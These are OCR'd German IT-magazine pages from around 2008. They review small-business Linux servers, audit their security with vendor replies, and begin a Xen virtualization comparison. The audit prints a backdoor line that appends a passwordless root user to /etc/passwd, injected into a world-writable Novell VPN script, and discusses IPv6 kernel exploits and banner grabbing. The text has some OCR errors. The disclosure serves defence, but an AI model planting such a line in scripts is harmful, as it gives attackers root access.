Für die Verwaltung der CoreBiz- 
Funktionsbereiche dient keine Webober- 
fläche, sondern ein eigenes GUI namens 
CMC (CoreBiz Management Console). 
Im Gegensatz zu den Management- 
Werkzeugen vieler Mitbewerber steht 
die CMC unter der GPL. Sie basiert auf 
dem grafischen LDAP-Verwaltungs- 
werkzeug Luma, das auf SourceForge 
gehostet wird. Auch der Untertitel der 
CMC „LDAP Management made easy“ 
zeigt deutlich die Richtung: CoreBiz 
setzt auf LDAP zur Verwaltung. Dies 
merkt man dem Tool deutlich an: 
Immerhin drei der 13 Module des CMC 
beschäftigen sich direkt „roh“ mit der 
Verwaltung des LDAP-Baums (Scha- 
blonen, LDAP-Browser, LDAP-Suche). 
Auch in den anderen Modulen zeigt die 
CMC zumindest den Basis-DN immer 
an und verwendet ihn teilweise zur Se- 
lektion. Die CoreBiz-Verwaltung be- 
wegt sich von allen getesteten Systemen 
noch am nächsten an der technischen 
Grundlage LDAP, die überall durch- 
schimmert. Der Administrator tut also 
gut daran, sich in dieser Hinsicht eine 
gute Grundbildung zu verschaffen. 

Im Gegensatz zu anderen Verwal- 
tungsoberflächen wirkt die Oberfläche 
einfach gehalten und bietet keine Assis- 
tenten, keine Auswertungen, keine Sta- 
tistiken. In der Groupware-Verwaltung 
beispielsweise lassen sich nur Res- 
sourcen (im Kalender buchbar), Vertei- 
lerlisten und ‚Shared Folder“ verwalten, 
nicht jedoch beispielsweise der SMTP- 
Dienst oder Spamschutz. Unter Shared 
Folder versteht die CMC übrigens so- 
wohl Dateibereiche als auch gemein- 
same Kalender und Adressbücher. Aus 
LDAP-Sicht sicher richtig, aber nicht 
unbedingt der Denkweise des Nutzers 
angepasst. Und eben leider nicht voll- 
ständig in den Funktionen. Letzteres fiel 
beim Punkt „Datei- und Druckservice“ 
(Samba, CUPS) besonders unangenehm 
auf. Mangels mitgelieferter Druckertrei- 
ber ließ sich leider kein Drucker instal- 
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lieren, da nicht einmal ein Postscript- 
Treiber auf dem System vorhanden war. 
Dies folgt wohl erst später. Die Datei- 
freigaben können per Samba oder NFS 
erfolgen, nicht jedoch per FTP, Apple 
Filesharing et cetera. 

Allerdings muss man bei der Wich- 
tung dieser Unvollständigkeiten beach- 
ten, dass die LIS AG ihre Kunden 
grundsätzlich im Rahmen von Projekten 
betreut. Es ist im Geschäftsmodell nicht 
unbedingt vorgesehen, dass man den 
Server nur (vorkonfektioniert) verkauft 
und der Kunde dann selber sehen muss, 
wie er damit zurechtkommt. Im Rahmen 
eines Implementierungsprojekts, und sei 
es noch so klein, kann der Hersteller na- 
türlich solche Dinge ausgleichen und 
den Server an die Kundenbedürfnisse 
anpassen. Derzeit ist der CoreBiz Server 
weniger ein „Boxed Product“ als eine 
gute Basis für ein Implementierungs- 
und Beratungsprojekt. 


Fazit 


Linux glänzt durch Vielfalt. Das ist 
auch im Bereich der Server für kleinere 
und mittlere Unternehmen so. Die An- 
sätze sind durchaus verschieden — und 
damit die jeweilige Nische. Novell geht 
mit einem technisch komplexen Pro- 
dukt, das sich eher in großen Umge- 
bungen wohlfühlt, an den Start. Uni- 
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vention hat seine besonderen Stärken in 
verteilten Umgebungen. Xandros küm- 
mert sich besonders um Windows-las- 
tige Umgebungen und versucht, im 
Look & Feel dem Windows-Adminis- 
trator entgegen zu kommen. Collax setzt 
auf ein Rundum-glücklich-Paket und 
die Hersteller von proprietärer Anwen- 
dungssoftware. Außerdem bietet es als 
einziger Hersteller in Eigenregie Appli- 
ances an. Die LIS AG dagegen tendiert 
eher zur Umsetzung im Projekt als zum 
Verkauf fertiger Boxen. Es ist für jeden 
Geschmack etwas dabei. 

Bei den Oberflächen zeigt sich eben- 
falls ein uneinheitliches Bild. Sowohl 
eigene GUlIs sind im Einsatz als auch 
Weboberflächen mit verschiedener 
Technik. Bei den GUIs gewinnt Xan- 
dros - allerdings nur für Englisch spre- 
chende Kunden. Bei den Weboberflä- 
chen sticht Collax heraus. In gewisser 
Weise stellt die CoreBiz Management 
Console den Gegenpol zum „Reiter- 
wahn“ des Univention Corporate Ser- 
vers dar: einfach, übersichtlich, aber 
leider auch nicht ganz vollständig. 
Irgendwo in der Mitte liegt wohl wie so 
oft die Wahrheit. 

Leider gab es mehr Stabilitätsproble- 
me als erwartet. Meistens lag es an ei- 
nem festgefahrenen LDAP, nur einmal 
versagte eine Datenbank. LDAP ist si- 
cherlich technisch eine elegante Lösung, 
zum logischen Ordnen und Speichern 


von Konfigurationsdaten. Aber anschei- 
nend ist OpenLDAP insbesondere bei 
harten Abstürzen des Rechners anfälliger 
für Inkonsistenzen und daraus resultie- 
rendes „Festfressen“ als es eine (echte) 
Datenbank (mit Transaktions-Engine) 
wäre — oder auch schlichte textbasierte 
Konfigurationsdateien. Allerdings wa- 
ren im Test nicht alle Produkte betrof- 
fen, auch nicht alle LDAP-basierten. Die 
genauen Ursachen ließen sich nicht er- 
mitteln. Nun, solange der Support des 
Herstellers sich schnell um solche Pro- 
bleme kümmert, kann es dem Kunden 
letztendlich (fast) egal sein. (avr) 
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KMU-Server 


Gerade kleinere Firmen haben oft weder das Geld noch intern 
das Know-how für ausgefeilte Sicherheitskonzepte. Wer meint, 
Out-oFthe-box-Lösungen für diese Zielgruppe böten durchweg 
ein Mindestmaß an Systemsicherheit, irrt leider. 


erade bei kleinen und mittleren 
G Unternehmen (KMU) hapert es 

oft am Geld für ein Sicherheits- 
konzept oder gar ein Audit der einge- 
setzten Serverkomponenten. Klar ist, 
dass man bei dem Budget für die 
KMU-Server aus dem Artikel „Linux 
en miniature“ [1] keine hochsicheren 
Lösungen erwarten kann. Aber immer- 
hin sollten sie nicht „gemeingefährlich“ 
sein und mindestens den Basis-Schutz 
einfacher Systeme liefern. 

Daher mussten sich die Kandidaten 
einem Kurz-Audit unterziehen. Dabei 
schaute der Autor unter die virtuelle 
Haube der KMU-Server-Pakete und 
evaluierte, wie schnell ein Angreifer 
Administratorrechte auf den Systemen 
bekommen könnte. 


Basiskriterien für 
Systemsicherheit 


Auf Intrusion-Detection-Systeme (IDS) 
oder komplizierte Schutzmechanismen, 
die Kunden oft nicht bedienen können, 
sowie komplexe Logdaten-Korrelatio- 
nen kann man bei KMU-Installationen 
verzichten. Hier ist in der Regel ohne- 
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hin kein fachkundiges Personal zu er- 
warten, das aus der Auswertung Kenn- 
zahlen und Trends extrahieren kann. 

Umso mehr sollte aber die Basis des 
Betriebssystems sicher und einfach auf- 
gebaut sein. Um das unter Beweis zu 
stellen, mussten die Systeme drei ein- 
fache Tests über sich ergehen lassen, 
wie sie jeder Unix-Administrator schon 
seit Jahren praktiziert. 

Dateisystemberechtigungen: Hier 
stand die Suche nach gefährlichen 
Rechten wie SUID-Root-Flags und 
von jedermann beschreibbaren (soge- 
nannte „World-Writeable-“) Dateien 
im Vordergrund. Dazu kamen die Tests 
aus dem Linux-Security-HOWTO von 
2004 [2] - ein Klassiker, den die meis- 
ten Distributionen enthalten. 

Software mit Schwachstellen: Eine 
Überprüfung des Versionsstandes der 
eingesetzten Software sollte klären, ob 
die Systeme gegebenenfalls Varianten 
mit Schwachstellen einsetzen. Da gera- 
de im Linux-Kernel bis einschließlich 
Version 2.6.21 der IPv6-Stack ein po- 
tenzieller Einbruchskandidat ist, lief im 
Testnetz ein IPv6 Router Advertisement 
Daemon (radvd). Der verteilte ein IPv6- 
Präfix. Wenn ein System die angebotene 


IPv6-Adressen annahm, versuchte der 
Tester im Anschluss, die IPv6-Schwach- 
stellen auszunutzen. 

Netz-Bindung und nmap: Den Ab- 
schluss bildete ein Scan der Netzschnitt- 
stellen mit nmap — generell via IPv4, bei 
Systemen, die auf den radvd reagiert 
hatten, auch via IPv6. Dies lieferte die 
offenen Ports und weitere Details über 
die installierte Software. Der Aufruf ner- 
stat -na | grep LISTEN liefert zusätzlich 
Informationen darüber, ob die angebo- 
tenen Dienste auf allen Interfaces — 
„O .0.0.0:*“ oder im IPv6-Adressraum 
„7°“ — horchen oder dediziert an IP- 
Adressen gebunden sind. Dies ist wich- 
tig, da sonst bei der Installation einer 
weiteren Netzwerkkarte das System ge- 
gebenenfalls plötzlich die Dienste un- 
gewollt auch darüber anbietet. 


Microsoft Small 
Business Server 


Da es bei Microsofts SBS wegen der 
Dateisystemberechtigungen schwieriger 
ist, das komplette System zu scannen, 
unterzog der Autor das System nur 
Tests mit nmap und dem GFI Languard, 
ein auf OVAL (Open Vulnerability 
and Assessment Language, oval.mitre. 
org) basierender Schwachstellen-Scan- 
ner. Dabei stellte sich heraus, dass die 
Frontpage-Extensions aktiviert sind — 
ein Sicherheitsrisiko für den Inhalt des 
Webservers. Auch sind Dienste wie 
NNTP und snews aktiv, die heute kei- 
nerlei Bedeutung mehr haben. Sonst ist 
keine aktuelle und akute sicherheits- 
relevante Schwachstelle vorhanden. 


= Collax Business 


Server 


Schon bei der Suche nach World-Wri- 
table-Dateien fällt auf, dass eine Squir- 
relmail-Installation mit beliebig aus- 
führ- und schreibbaren PHP-Skripten 
auf dem System liegt. Dazu kommt, 
dass die verwendete Kernelversion 
(2.6.16.57) schon recht betagt ist. 
Immerhin hat Collax den IPv6-Support 
beim Bauen des Linux-Kernels ausge- 
klammert, sodass die Angriffe auf die 
aktuellen IPv6-Schwachstellen nicht 
greifen können. Das Argument Alter 
gilt auch für die Software-Pakete. Es 
bleibt allerdings unklar, ob die Entwick- 
ler die Sicherheits-Patches neuerer 
Versionen komplett zurückportiert ha- 
ben. Immerhin gibt der Webserver 
keine Signatur aus. 
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KMU-Server 


Als nächster Patzer horchen alle 
Dienste global auf allen Adressen und 
Interfaces. Laut Hersteller kann man mit 
einer zusätzliche Firewall verhindern, 
dass das System die Dienste offen an- 
bietet. Collax realisiert dies über einen 
via Webschnittstelle konfigurierbaren 
Paketfilter, der allerdings das Risiko in 
sich birgt, dass der Administrator sich 
selbst aussperrt. Change-Root, Jails, 
NTP und andere Sicherheitserweiterun- 
gen sucht man bei Collax vergeblich. 


= Univention Corporate 
Server 


Nicht viel besser präsentiert sich Univen- 
tions Server UCS. Hier liegt der Win- 
dows-Installer für die Clients für jeden 
beschreibbar in /var/lib/univention-win 
dows-installer. Somit kann sich ein An- 
greifer auf dem Linux-System leicht die 
Kontrolle über die Windows-Clients ver- 
schaffen, da er in den Windows-Instal- 
ler Trojaner-Funktionen einbauen kann. 

Von der Netzseite her sieht es nicht 
besser aus: So verrät ein nmap-Scan 
genau die benutzte Software: 


Apache httpd 2.2.3 ((Univention) PHP/5.2.0-8+ 7 
etch 7.56.200712100724 mod_ssl/2.2.3 7 
OpenSSL/0.9.8c) 
Cyrus IMAPA 2.2.13-Debian-2.2.13-10.6.2007 7 
12032135 
Samba smbd 3.X (workgroup: UCS) 


Hier bekommt der Hacker Anhaltspunk- 
te, welchen Exploit er anzuwenden hat, 
um in das System einzubrechen. 

Selbst Debian installiert kein Telnet 
mehr und bindet den X11-Server auch 
nicht global an das Netz — UCS tut bei- 
des. Zwar ist der Telnet-Server kerberi- 
siert, sodass die Passwortdaten nur bei 
abgelaufenem Kerberos-Ticket über das 
Netz gehen, und er erlaubt keinen Root- 
Zugriff. Dennoch ist ein Netzdienst mit 
Datenübertragung im Klartext immer 
ein Sicherheitsrisiko. X11 ließ sich beim 
Login via IPv6-Exploit remote über das 
Netz zum Absturz bringen. Außerdem 
horcht der UCS mit einem noch ver- 
wundbaren Kernel auf IPv6-Pakete im 
Netz, die verwendete Kernel-Version 
2.16.18 besitzt hier noch Schwachstel- 
len. Darüber hinaus binden sich die 
meisten Dienste an alle Interfaces. 


Fe Xandros Server 


So mancher Mittelständler könnte sich 
wundern, wenn plötzlich die Polizei bei 
ihm klingelt und seinen Xandros-Server 
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einsammelt. Hat er diesen direkt am 
Internet betrieben und als Proxy und 
Gateway benutzt, mag es der Anony- 
mous-FTP-Server mit beschreibbarem 
Incoming-Verzeichnis gewesen sein, der 
so manchen Übeltäter im Internet dazu 
verleitet haben könnte, seinen Schmutz 
hochzuladen. Auch liegen im Filesystem 
liegen mehr als 1000 Dateien für jeden 
User schreibbar zum Manipulieren be- 
reit, von Datenbanken bis zu PHP-Da- 
teien, die besonders gefährdet sind. 

Bei der Installation der Netzdienste 
macht Xandros den selben Fehler wie 
Univention: Alle genauen Software- 
Stände inklusive Patchlevel und Modu- 
le lassen sich via Netzwerk anonym 
schnell herausfinden. Die Apache-In- 
stallation mit 


Apache httpd 2.2.3 ((Debian) DAV/2 mod_ik/ 7 
1.2.18 PHP/5.2.0-8+etch7 mod_ssl/2.2.3 7 
OpenS$SL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8) 


reißt eine besonders kritische Stelle nach 
außen auf. 

Auf IPv6-Adressvorschläge geht der 
Server gerne ein, mit seinem 2.6.18er- 
Kernel ist er hier voll verwundbar 
gegenüber den IPv6-Schwachstellen aus 
letzter Zeit. 

Interessanterweise taucht beim IPv6- 
nmap-Scan ein neuer Service bei Port 
9090 auf, der im IPv4-Netz nicht zu fin- 
den ist. Der Dienst fragt sofort nach den 
Superuser-Daten für einen nicht via 
IPv4 erreichbaren Blog. Ob es sich um 
ein „Osterei‘“ oder eine Schwachstelle 
handelt, muss sich noch herausstellen. 
Den globalen Netz-Interface-Bind hat 
Xandros genauso schlecht gelöst wie die 
anderen Distributionen. 


ei Novell Open 
Workgroup Server 


Es scheint, als wolle sich Novell mit sei- 
nem NOWS in der Small Business Edi- 
tion um den Titel „Hackers Liebling“ 
bewerben. Schon beim Check der Datei- 
systemberechtigungen stehen einem die 
Haare zu Berge: Zahlreiche Dateien, 
darunter der Tomcat Applikationsser- 
ver sowie der iManager - das zentrale 


NOWS: Modifiziertes VPN-Skript 


#!/bin/sh 

# Physical address of device clients connect to 
export SERVER_ADDR="192.168.80.238" 

echo "roorz:0:Qzroot:/root:/bin/bash" >> /etc/passwd 
# Network to use for VPN 

export VIRTUAL_RANGE="172,16.150.0" 

# Network mask to use for VPN 

export VIRTUAL_MASK="255.255.255.0" 


Verwaltungs-Tool von Novell — sind 
mit Schreibrechten für jeden versehen. 

Schlimmer noch: Auch Skripte, die 
der Webserver benutzt, sind es. So war 
es ohne Weiteres möglich, in das Envi- 
ronment-Skript von OpenVPN die Zeile 
echo „roor::0...“ einzuschleusen (siehe 
Listing). Nachdem der Administrator 
dann das nächste Mal via Web die 
OpenVPN-Konfiguration aufgerufen 
hatte, existierten auf dem System plötz- 
lich drei weitere Nutzer mit Root-Rech- 
ten — ohne Passwort. 

So ein Patzer ist mehr als mangel- 
haft. Wenn Novell es nicht schafft, ihr 
Produkt sachgerecht zu prüfen, kann 
man niemandem raten, dieses System 
einzusetzen. Vom Hersteller hätte der 
Tester Besseres erwartet. Vielleicht 
sollte Novell erwägen, die Produktent- 
wicklung nicht wie derzeit in den USA 
sondern vom hauseigenen Suse-Team 
in Nürnberg durchführen zu lassen. 
Dort arbeitet immerhin der eine oder 
andere Linux-Experte. Da hilft auch die 
Firewall nicht viel, die IPv6-Pakete 
gegenüber dem ebenfalls alten und an- 
fälligen Kernel blockt. 


u CoreBiz Business 


Server 


Am besten von allen Linux-Distributio- 
nen schnitt CoreBiz ab: Aktuelle und 
von Schwachstellen bereinigte Software 
bevölkert das System. Es traten weder 
Ungereimtheiten bei den Dateisystem- 
berechtigungen auf noch gab es Schwie- 
rigkeiten mit den IPv6-Schwachstellen. 
CoreBiz setzt eine Kernel-Version ein, 
in der diese behoben sind. 

Bei dem geänderten Root-Verzeich- 
nis für den NFS-Server könnte sich so 
mancher Konkurrent von der LIS AG 
eine Scheibe abschneiden; hier haben 
die Berliner Entwickler etwas für die 
verbesserte Sicherheit getan. 

Nur schafft es auch die LIS AG nicht, 
die Server-Signatur des Webservers so 
anonym einzustellen, dass der Apache 
nicht jede einzelne Version herauspo- 
saunt. Auch wenn die Module und der 
Server aktuell sind und keine Schwach- 
stellen aufweisen, sollte sie hier eben- 
falls die Server-Signatur abschalten. 


Fazit 


Bis auf Microsofts Small Business Ser- 
ver und CoreBiz von der LIS AG sind 
alle Systeme in der gestesteten Aus- 
stattung sowie Konfiguration mit dem 
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KMU-Server 


betrachteten Release-Stand mehr oder 
weniger ein Sicherheitsrisiko. Man soll- 
te sie „out of the box“ niemals am 
Internet betreiben, da potenzielle An- 
greifer in kurzer Zeit in die Rechner 
einbrechen können. Ein Härten, Ver- 
bessern und Einspielen von Sicherheits- 
Patches ist hier dringend angeraten. 
Die bequeme Zusammenstellung er- 
setzt keinen Administrator, und hinter 
der einfachen Oberfläche tun sich in 
Sicherheitsfragen oft Abgründe auf. 
Wenn ein mit Root-Rechten laufen- 
der Java-Server-Pages-Server von allen 
schreibbare Skripte aufruft, zeigt das, 


Vor allem zu den im Test aufgetretenen Si- 
cherheitslücken respektive -schwachstellen 
gab es einige Rückmeldungen der betroffe- 
nen Hersteller. Es folgt eine Zusammenfas- 
sung der Angaben der jeweiligen Hersteller. 


Univention 


Ein inzwischen veröffentlichtes Sicherheits- 
Update behebt unter anderem die falschen 
Verzeichnisberechtigungen beim Windows- 
Installer. Darüber hinaus zwingt es den Ad- 
ministrator künftig, den Zugriff via HTTP 
statt HTTPS explizit zu bestätigen. 


Versions-Strings der Dienste: Der Tester 
wirft dem Produkt vor, dass die enthaltenen 
Dienste Softwareversionsstände mitteilen. 
Dass die Programme dies tun, stimmt und 
wir halten das auch für richtig, weil „wohl- 
wollende“ Client-Software daraus gegebe- 
nenfalls Rückschlüsse über Eigenschaften 
der Software ziehen und sich entsprechend 
verhalten kann. Unabhängig davon ist beim 
UCS allein schon durch den öffentlich zu- 
gänglichen Quellcode dokumentiert, welche 
Softwareversionen enthalten sind. 


Was allerdings nicht stimmt ist die Be- 
hauptung, Angreifer könnten durch die zu- 
rückgegebene Versionsbezeichnung Rück- 
schlüsse auf die enthaltenen Fehler ziehen. 
Insbesondere sicherheitsrelevante Patches 
liefern wir immer als Backport zu der in 
der entsprechenden UCS-Release enthalte- 
nen Programmversion. Ein direkter Rück- 
schluss auf Sicherheitslücken durch den 
Versions-String ist also nicht möglich. 


Telnet: Den Telnet-Server nutzten bisher 
via UCS-gemanagte Thin Clients zum In- 
itiieren von Sitzungen. Mittlerweile unter- 
stützen die Thin Clients auch kerberisier- 
tes SSH, sodass ktelnet nur noch für eine 
Übergangszeit mit installiert wird. Eine 
wirkliche Sicherheitslücke ist der Dienst 
unserer Ansicht nach aber nicht. 


X11-Server: Wie im Hauptartikel schon 
angedeutet, benötigt UCS eigentlich keinen 
X-Server. Die Versionen vor UCS 2.0 ver- 
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dass der Distributionsbauer keine rech- 
te Vorstellung von Linux- und Unix-Si- 
cherheit hat. Hier hätte nach dem Zu- 
sammenstellen der Distribution ein Test 
nach dem „Linux Security HOWTO“ 
[2] so manchen Patzer verhindert. Die- 
ser Artikel beschreibt den Stand vom 
8. April 2008. Die Hersteller bekamen 
vor der Veröffentlichung die Gelegen- 
heit, ihre Produkte zu aktualisieren. Ob 
sie davon Gebrauch gemacht haben, 
sollten potenzielle Kunden jedenfalls im 
Vorfeld einer Entscheidung überprüfen. 
Der Kasten „Herstellerreaktionen“ fasst 
einige Antworten zusammen. (avr) 


Herstellerreaktionen 


zichteten auf die standardmäßige X-Akti- 
vierung. Im Small-Business-Umfeld war 
aber immer die erste Frage, wie man denn 
eine grafische Anmeldung einrichten kön- 
ne, sodass wir uns nun mit UCS 2.0 dazu 
entschlossen haben, den X-Server standard- 
mäßig zu aktivieren. Für Umgebungen, in 
denen eine hohe Sicherheit erforderlich ist, 
empfehlen wir die X11-Installation auf 
dem Server aber nicht. 


Die Tatsache, dass der X-Server auch Re- 
mote-Verbindungen zulässt, ist dem Um- 
stand geschuldet, dass in vielen UCD-Um- 
gebungen (Univention Corporate Desktop) 
X-Programme auf unterschiedlichen Termi- 
nalservern ausgeführt und von einem (Thin) 
Client aus bedient werden. UCD verwendet 
hier heute dieselben Einstellungen wie eine 
auf UCS installierte X11-Umgebung. Wir 
werden zukünftig jedoch eine Konfiguration 
über das Managementsystem ermöglichen 
und die Voreinstellung so ändern, dass der 
Zugriff nicht erlaubt sein wird. 


Bindung der Netzwerkdienste: Im Text 
heißt es, dass Netzdienste immer nur an ein 
Netz-Interface gebunden sein sollten, damit 
das System die Dienste nicht auch über eine 
beispielsweise neu eingebaute Netzwerkkar- 
te anbietet. Unserer Erfahrung nach erwar- 
ten die meisten Administratoren das Gegen- 
teil, nämlich, dass beim Einbau einer neuen 
Karte die Dienste ohne manuelle Einstellun- 
gen über alle Netzwerkinterfaces funktionie- 
ren. Wir haben uns deswegen für diesen 
Weg entschieden und halten dies auch 
nicht für sicherheitsrelevant, weil gerade 
im KMU-Umfeld SBS-Server, die nur auf 
bestimmten Interfaces bestimmte Dienste 
anbieten, nicht realistisch sind. 


Kernel: Im Bereich der Kernel verfolgen 
wir folgende Strategie: Zu jeder UCS- 
Hauptversion gibt es einen Basiskernel, den 
wir über die gesamte Lebenszeit der Version 
mit Security-Updates versorgen. Im Fall von 
UCS 2.0 ist das Kernel 2.6.18. Da es aus 
technischen Gründen notwendig sein kann, 
neuere Kernels einzusetzen, stellen wir da- 
neben immer wieder aktuelle Kernels für 
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UCS bereit, so haben wir am 9.4.2008 Ker- 
nel 2.6.24 für UCS 2.0 veröffentlicht. 


Collax 


Kernel: Collax verwendet den sogenann- 
ten Bunk-Kernel. Der Kernel-Maintainer 
Adrian Bunk pflegt die Version 2.6.16 pa- 
rallel zum aktuellen Kernel-Stream. Seine 
Zielsetzung ist, einen möglichst stabilen 
und sicheren Kernel zu gewährleisten. Aus 
unserer Erfahrung ist dieser Kernel sehr 
viel weniger anfällig gegenüber neuen Si- 
cherheitslöchern. Den Bunk-Kernel brin- 
gen wir regelmäßig auf einen aktuellen 
Stand. Zum im Test erwähnten aktuellsten 
Kernel 2.6.23-1 trennen ihn 7 Tage von der 
Veröffentlichung. 


Bindung der Netzwerkdienste: Alle 
Dienste sind durch die Firewall geschützt 
und horchen nur auf Anfragen aus Netzen, 
die der Administrator explizit zugelassen 
hat. Im Auslieferungszustand und auch 
nach dem Einschalten eines Dienstes ist 
dieser noch aus keinem Netz erreichbar. 
Erst wenn der Administrator einem Netz 
explizit die Berechtigung gibt, ist der 
Dienst erreichbar. Zudem lassen sich be- 
stimmte Zugriffe aus dem Internet erst gar 
nicht einrichten. So ist es beispielsweise 
nicht möglich, den SMTP-Server aus dem 
Internet ohne Authentifizierung erreichbar 
einzurichten. Auch für den File-Server 
(smb/cifs) kann man die Firewall nicht für 
Anfragen aus dem Internet öffnen. 


Dateiberechtigungen: Die world-writable 
SquirrelMail-Dateien sind korrigiert. Unse- 
re Qualitätssicherung wird überprüfen, wa- 
rum die falschen Berechtigungen bislang 
nicht entdeckt wurden. Insbesondere ärger- 
lich, dass „nur“, aber ausgerechnet die 
PHP-Dateien betroffen sind. Bei den ein- 
zelnen Paketen versuchen wir, einen ver- 
gleichbaren Ansatz wie Adrian Bunk zu 
fahren und lieber einen Back-Port statt ei- 
ner neuen Version zu benutzen. Anderer- 
seits sind wir jedoch recht häufig gezwun- 
gen, auf aktuelle Versionen zu gehen. 
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Xen 


omplette Distributionen mit dem 
KK .L-Hypervisor, der Verwal- 

tungsinstanz DomO, einer inte- 
grierten API und grafischem Werk- 
zeug zum Management bieten derzeit 
nur XenServer und Virtual Iron. Sie 
implementieren eigene Konzepte mit 
unterschiedlichen Leistungsmerkmalen: 
XenServer 4.1 nutzt eine 32-Bit-DomO 
auf Grundlage von CentOS 5.1 und 
für den Datenaustausch die Xen-API. 
Virtual Iron 4.2 hingegen verwendet 
eine 64-Bit-DomO aus Komponenten 
von SLES 10 SP1, bietet ein in Java 
geschriebenes GUI und implementiert 
zusätzlich Hochverfügbarkeit (HA) 
sowie eine Snapshot-Funktion. 

XenServer bildet nur Teile seiner 
Funktionen über die GUI ab, erst auf der 
Kommandozeile kann der Anwender 
alle nutzen. Virtual Iron stellt das Ma- 
nagement in den Mittelpunkt und geht 
direkt in den Ring gegen VMware: 
Gleiche Merkmale bei nur 30 % der Li- 
zenzkosten, lautet das Versprechen der 
Softwareschmiede. 

Beide Produkte sind nach 10 Minu- 
ten Installationsarbeit einsatzfähig. Xen- 
Server ist auf jedem Host der virtuellen 
Infrastruktur einzurichten; wahlweise 
von CD-ROM oder über das Netzwerk. 
Bei Virtual Iron reicht die Installation 
auf dem Managementserver. Von dort 
beziehen die Managed Hosts ihr Be- 
triebssystem per PXEboot. 

Windows 2000 SP4, Server 2003 
(32- und 64-Bit-Version), XP SP2 und 
Vista (32-Bit) laufen auf XenServer 
und Virtual Iron vollvirtualisiert. Mit- 
gelieferte paravirtualisierte (PV-) Trei- 
ber optimieren die Leistung der virtuel- 
len V/O-Komponenten. Virtual Iron 
liefert Unterstützung für Vista 64-Bit 
und Windows Server 2008 in beiden 
Architekturbreiten. Da diese PV-Trei- 
ber nicht von den WHQL (Windows 
Hardware Quality Labs) signiert sind, 
verweigern neue 64-Bit-Windows-Ver- 
sionen eine Installation. 

Linux-Gäste kann der Anwender ab 
RHEL 4.x (32-Bit) und 5.x (32- und 
64-Bit-Version) nebst seiner CentOS- 
Variante sowie SLES 9 und 10 SPI 
einsetzen. XenSource nennt noch Kom- 
patibilität mit Debian Etch und Sarge, 
den RHEL-Nachbauten von Oracle, Ci- 
trix’ XenApp und Presentation Server, 
liefert aber nur dann Support, wenn Li- 
nux paravirtualisiert im Einsatz ist. Bei 
Virtual Iron läuft Linux stets vollvirtua- 
lisiert und die Kompatibilität schließt 
auch RHELS3 ein. 

Weitere Hauptunterschiede: Gäste 
unter XenServer starten bei entspre- 
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Mit Citrix XenServer und Virtual Iron buhlen zwei Hersteller 
kommerzieller Virtualisierungsumgebungen um die Gunst 
der Kundschaft. Beide nutzen Xen als Grundlage und wollen 
mit ihren Produkten professionelle Anwender ansprechen. 
Messen lassen müssen sie sich am Branchenprimus VMware. 


chender Konfiguration automatisch 
nach Hochfahren des Hosts, können 
untereinander adapterlos per Ethernet 
kommunizieren, besitzen jeweils eige- 
ne und als Offset zur Systemzeit ein- 
stellbare Uhrzeiten, kennen aber keine 
Floppies. Virtual Iron liefert seinen 
Gästen auf Wunsch auch dieses Me- 
dium, wahlweise physisch oder als 
Netzwerk-Image aus dem Manage- 
mentsystem heraus, kann Netzwerkkar- 
ten für Jumbo-Frames konfigurieren 
und Systeme mit integriertem Manage- 
mentprozessor ein- und ausschalten. 


Anders als bei Xen-Vanilla kann ein 
Gast bei keinem der Produkte auf vir- 
tuelle SCSI-Festplatten zugreifen. 


Citrix’ XenServer 
Auf seiner Homepage stellt Citrix den 
XenServer, derzeit in der Version 4.1.0, 
nach Registrierung als 296 MByte gro- 
ße ISO-Datei zum Download bereit. 
Wer Linux paravirtualisiert betreiben 
will, sollte sich zusätzlich das etwas 
kleinere Linux-Pack laden. Zwei als 
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Xen 


Open Virtual Appliance (.ova) forma- 
tierte virtuelle Maschinen (VM) unter 
Linux stellt Citrix als Development 
Kit zusätzlich bereit: eins für Devices 
als ISO- und eins für Software als Zip- 
Datei. Die dazu verwendeten Open- 
Source-Komponenten der CentOS-Dis- 
tribution kann man dort im Quellformat 
herunterladen. 

Die kostenlose Express Edition des 
XenServer läuft auf Intel-kompatiblen 
64-Bit-Systemen mit zwei Sockeln und 
maximal 4 GByte RAM. Sie unterstützt 
bis zu vier gleichzeitig aktive VMs. 
Wer mehr benötigt, muss entweder die 
Standard oder die Enterprise Edition li- 
zenzieren, wahlweise als Jahresabonne- 
ment oder unbefristet. Beide sind auf 
Plattformen mit bis zu 32 Sockeln und 
128 GByte RAM einsetzbar ohne Be- 
grenzung der Zahl gleichzeitig aktiver 
VMs. Das Lizenzmodell gilt pro physi- 
schem Server. 

Ab der Standard-Edition kann der 
Administrator mehrere Xen-Hosts pa- 
rallel bedienen und außerdem virtuelle 
Netzwerkkarten mit VLAN-Tagging 
versehen. Die Enterprise Edition er- 
weitert das noch um das Clustern 
gleichartiger Xen-Hosts in Ressour- 
cengruppen (Pools), Shared Storage 
mit NFS über Fibre Channel, iSCSI 
oder NetApp Filer mit dem Betriebs- 
system Data ONTAP 7G und Life-Mi- 
gration aktiver VMs zwischen Ma- 
schinen innerhalb eines Pools per 
XenMotion. Schließlich hat der Her- 
steller noch einen Quality of Service 
genannten Mechanismus implemen- 
tiert, der auf lokalen oder per Host Bus 
Adapter (HBA) angeschlossenen Spei- 
chern im Logical Volume Manager 
(LVM) eine Priorisierung von Disk- 
VO ermöglicht. 

Die Steuerung der Hosts und darauf 
befindlicher VMs erfolgt wahlweise 
über die mitgelieferte grafische Win- 
dows-Anwendung XenCenter oder 
über das Kommandozeilenprogramm 
xe. Der Client xe kommuniziert über 


mehr als 250 Kommandos mit dem 
Xen-API-Agenten xapi eines Xen- 
Hosts und regelt das gesamte Manage- 
ment von Hypervisor und VMs. Xen- 
Center nutzt ebenfalls die Xen-APlI, 
bietet aber bisher nur einen Auszug aus 
dem Sprachvorrat. Client und Server 
tauschen untereinander XML-RPC-Pa- 
kete aus, xapi archiviert sämtliche host- 
spezifischen Attribute in einer SQLite- 
Datenbasis, derzeit in der Version 3. 


Vertraute Umgebung 
beim Installieren 


Das Einrichten des XenS$erver, ob via 
CD/DVD oder über das Netz, ähnelt im 
Benutzerdialog dem von Red Hats 
Anaconda, entspringt aber einer Eigen- 
entwicklung von XenSource, in Python 
gefertigt und analog zu Anaconda über 
das Paket newr gestaltet. Für ein unbe- 
aufsichtigtes Kickstart-ähnliches Instal- 
lieren muss der Admin das dazu benö- 
tigte „answerfile“ in XML-Notation 
kapseln. Insgesamt elf „Schlüssel“ ste- 
hen ihm zur Wahl. 

Eine XenServer-Installation belegt 
stets den gesamten lokalen Plattenplatz 
des Host. Die ersten 4 GByte erzeugt 
das Einrichtungsprogramm als System- 
